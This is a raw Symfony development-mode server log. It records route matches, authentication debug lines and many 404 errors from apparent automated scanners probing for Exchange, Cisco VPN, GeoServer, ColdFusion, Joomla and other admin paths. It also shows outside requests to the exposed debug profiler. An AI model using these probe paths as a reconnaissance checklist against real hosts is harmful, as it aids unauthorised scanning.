[2025-12-19 09:01:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=request","method":"GET"} []
[2025-12-19 09:01:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 09:06:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:12:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:13:04] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FHona%2FLandingBundle%2FController%2FDefaultController.php&line=14","method":"GET"} []
[2025-12-19 09:14:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:15:37] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:16:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:18:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:19:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:20:14] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 09:22:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=config","method":"GET"} []
[2025-12-19 09:22:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 09:28:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=config","method":"GET"} []
[2025-12-19 09:28:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 09:28:52] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:30:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=db","method":"GET"} []
[2025-12-19 09:30:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-19 09:30:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=cache","method":"GET"} []
[2025-12-19 09:30:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 09:30:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.hona.mx/","method":"GET"} []
[2025-12-19 09:30:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 09:30:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:30:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:30:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:30:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:30:54] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:30:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.hona.mx/","method":"GET"} []
[2025-12-19 09:30:56] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 09:30:56] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:30:56] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:30:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
[2025-12-19 09:30:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cgi-mod/header_logo.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cgi-mod/header_logo.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /health"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /health\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /nmaplowercheck1766136655"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /nmaplowercheck1766136655\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:56] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:30:56] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:30:56] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:30:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dana-cached/hc/HostCheckerInstaller.osx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dana-cached/hc/HostCheckerInstaller.osx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /human.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /human.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v2/about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v2/about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOE+/logon.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOE+/logon.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /HNAP1"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /HNAP1\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dashboard/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dashboard/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /user"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /user\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /geoserver/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /geoserver/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /geoserver/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /geoserver/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /evox/about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /evox/about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /magento_version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /magento_version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v1/check-version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v1/check-version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml/info.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml/info.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Account/Login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Account/Login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cgi-bin/info.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cgi-bin/info.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /CFIDE/componentutils/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /CFIDE/componentutils/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cluster/list.query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cluster/list.query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps/zxtm/login.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps/zxtm/login.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/server/version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/server/version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrator/manifests/files/joomla.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrator/manifests/files/joomla.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /versa/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /versa/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
